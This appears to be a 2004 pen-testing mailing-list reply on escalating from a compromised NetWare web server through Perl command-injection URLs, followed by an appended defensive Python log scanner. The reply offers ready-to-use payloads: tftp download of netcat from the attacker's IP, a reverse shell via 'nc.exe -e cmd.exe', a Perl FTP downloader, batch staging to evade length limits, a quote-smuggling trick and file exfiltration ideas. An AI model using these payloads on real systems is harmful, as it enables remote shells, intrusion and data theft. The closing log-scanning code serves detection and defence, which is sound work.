Re: Escalating from Netware box

From: Dave Nuull (gotodevnull_at_hotmail.com)
Date: 08/15/04

    To: pen-test@securityfocus.com
    Date: Sun, 15 Aug 2004 12:02:35 -0400


    McKenna Henage or Beme Lee wrote:

    >I'm wrapping up a pen-test and I've gained access to a
    >NetWare-Enterprise-Web-Server/5.1 box through the ability to run Perl
    >commands using specially crafted URLs (e.g.,
    >"perl/-e%20system(%22dir%22);"). I wrote a program in Perl that crafts the
    >URLs to allow me to easily read any file on the server, write to any file,
    >or execute any command. However, without any Novell experience (I am a MS
    >and Linux guy), I am unable to escalate to the point of being able to
    >attack other systems on the client's network.

    Aside question: If perl -e is a command line option, why does a simple 'dir'
    not work? Or a cmd%20/C%20dir?

    >Any suggestions for ways I can use this Netware box to further exploit
    >their networks would be very much appreciated. In particular, I'm interested in
    >discovering what other devices are on their network (since I can only see
    >their Netware box from the Internet), performing port scans, vulnerability
    >scans, etc. I need to be nice to the server since it is in production, so
    >I'm trying not to experiment too much on their machine and risk bringing it
    >down (already crashed it once!).

    If you can execute on the remote server, and if there are any 'closed' ports
    (i.e. not filtered), then have you tried to tftp up a nc.exe and shovel a
    shell back to your attack host?
    i.e.
       "perl/-e%20system(%22tftp%20-i%20Your_IP%20get%20nc.exe%22);"
       "perl/-e%20system(%22nc.exe%20-e%20cmd.exe%20Your_IP%20Your_Port%22);"

    If, as you say below, you can't find the tftp client, what about perl's FTP
    module? This one does not contain any " or ' chars, so you could echo all the
    lines into a file on the remote server and run it from the command line.

    use Net::FTP;
    # args: host user password filename
    $ftp=Net::FTP->new($ARGV[0]);
    $ftp->login($ARGV[1],$ARGV[2]);
    $ftp->binary();   # binary mode so executables are not mangled
    $ftp->get($ARGV[3]);
    $ftp->quit();

    >I've already done some research on Netware, including listening to RFP's
    >Black Hat talk on Netware, and reading the "Novell Hacking FAQ" available
    >on the web. Unfortunately most resources I've found refer to Netware 2.x, 3.x,
    >and 4.x. Here is what I've been able to gain so far, thanks to having
    >partial access to files on the system using directory traversal:

    If you have partial access to files (i.e. at least read access), could you
    not tftp complete files back to your attack host? This again assumes they
    have not configured restrictive outbound filtering on their firewall. If you
    can find their internal mail server, you could craft some SMTP commands and
    mail them to yourself instead :-)

    >-Internal IP address
    >-IPX servers (running the command "display ipx servers")
    >-See unencrypted passwords in /system/autoexec.ncf and /etc/netinfo.cfg
    >(and to crack a password in /Novonyx/suitespot/admin-serv/config/ADMPW)
    >-Successfully ping out to a device on the Internet (unfortunately it
    >appears to be continuous, because I wasn't able to stop it)
    >-...and pretty much anything else that is in a file, or almost any command
    >
    >I have run into some limits:
    >
    >-Any request I make (to read/write a file or execute a command) is limited
    >in character length, hampering my ability to execute an elaborate Perl
    >program on the box or even to read some files that are too far down the
    >directory tree

    If you have command length limits, perhaps try to create a .bat file on
    the remote server using echo appends and splitting the command into smaller
    sections.
      "perl/-e%20system(%22echo%20cd%20some_path%20>>mycmd.bat%22);"
      "perl/-e%20system(%22echo%20run_command%20>>mycmd.bat%22);"
      "perl/-e%20system(%22mycmd.bat%22);"

    >-Haven't found a way to send some characters such as " and ', even after
    >trying everything I could think of (encoding, double encoding, etc.). Wish
    >I could do that because then I could essentially start writing a new Perl
    >script to their machine and overcome the character limitation just
    >mentioned, and potentially find a way to upload a Perl port scanner of some
    >sort.

    If you have perl interpreter access, you could use the pack/unpack functions
    to decode the " or ' chars from decimal/hex/octal, and using one-liners
    unpack the chars on the remote host. Ref: an ASCII chart for char->hex values.
    i.e.
    C:\>perl -e $a=pack(H6,222027);print$a;
    " '

    >-An inability to correctly view all files. Since I'm getting the files fed
    >back in a web browser, I can sometimes only see the first parts of a file
    >(up to 500K or so), and have trouble downloading binaries.
    >
    >-An inability to see the entire results of a command run on the system. I
    >can run a command, but then to see the results I have to open
    >/etc/console.log and read the last few lines (so I can't always see the
    >entire results, because it appears to be cut off in the log).

    Do command output redirections into your own log file not work on the
    server?

    >-I don't even know how to download files to the Netware box. I have been
    >unable to determine if it has a HTTP or FTP client I can use to pull down a
    >trojan/backdoor program, netcat, or anything else.
    >-Some blockage at the firewall (?). For example, I tried loading the remote
    >console and then accessing it remotely, but it appears to be blocked at the
    >firewall since I can't get in. If it were a Linux/Unix/Windows box then I'd
    >know how to download a SSH client and reverse-tunnel a connection out
    >through the firewall, but I'm clueless on Netware.
    >
    >Thanks in advance for any suggestions you can provide in the next couple
    >days.
    >
    >Beme Lee

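The whole thread turns on one web-server behaviour: a request path of the form perl/-e%20system(...) is handed to the Perl interpreter, and the quoting and encoding tricks discussed above all show up in the access log as percent-encoded request paths. The following is an added example, not code from either poster, of how a defender would sweep such a log for that pattern. It parses Common Log Format lines, percent-decodes each path repeatedly so double-encoded payloads are normalised before matching, and flags the perl/-e handler, a system( call, and the >>file.bat staging trick from the reply. The log lines, hosts and timestamps are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format). Hosts, timestamps
# and paths are made up for this example; the request shapes mirror the thread.
SAMPLE_LOG = """\
203.0.113.7 - - [15/Aug/2004:12:02:35 -0400] "GET /perl/-e%20system(%22dir%22); HTTP/1.0" 200 512
203.0.113.7 - - [15/Aug/2004:12:03:10 -0400] "GET /perl/-e%2520system%2528%2522dir%2522%2529%253B HTTP/1.0" 200 512
198.51.100.4 - - [15/Aug/2004:12:04:01 -0400] "GET /index.html HTTP/1.0" 200 2048
203.0.113.7 - - [15/Aug/2004:12:05:44 -0400] "GET /perl/-e%20system(%22echo%20x%20>>mycmd.bat%22); HTTP/1.0" 200 10
198.51.100.9 - - [15/Aug/2004:12:06:12 -0400] "GET /cgi-bin/search.pl?q=perl HTTP/1.0" 200 900
"""

# Common Log Format: host ident user [timestamp] "method path protocol" status size
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(s, max_rounds=3):
    """Percent-decode until stable so %2522 -> %22 -> " is seen as a quote."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


# Indicators taken from the thread: the perl/-e handler path, a shell call
# inside the one-liner, and append-redirection used to stage a batch/NCF file.
INDICATORS = [
    ("perl-e-handler", re.compile(r"/perl/-e", re.I)),
    ("system-call", re.compile(r"\bsystem\s*\(", re.I)),
    ("redirect-append", re.compile(r">>\s*\S+\.(?:bat|ncf)\b", re.I)),
]


def classify_request(path):
    """Return (normalised path, list of indicator names that matched)."""
    decoded = fully_decode(path)
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    return decoded, hits


def scan_log(text):
    """Parse CLF lines and report requests that reach the perl/-e handler
    or carry a system( call; redirect-append is reported as extra context."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF (or are truncated)
        decoded, hits = classify_request(m.group("path"))
        if "perl-e-handler" in hits or "system-call" in hits:
            findings.append({
                "host": m.group("host"),
                "ts": m.group("ts"),
                "decoded_path": decoded,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["host"], ",".join(f["indicators"]), f["decoded_path"])
```

Matching is done on the fully decoded path rather than the raw one, which is the caveat that matters here: a signature written against the literal string %22 would miss the double-encoded variant in the second sample line, while decoding to a fixed point catches both. The redirect-append indicator is kept separate because on its own it is too noisy to alert on, but it is useful context once the handler path has already fired.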
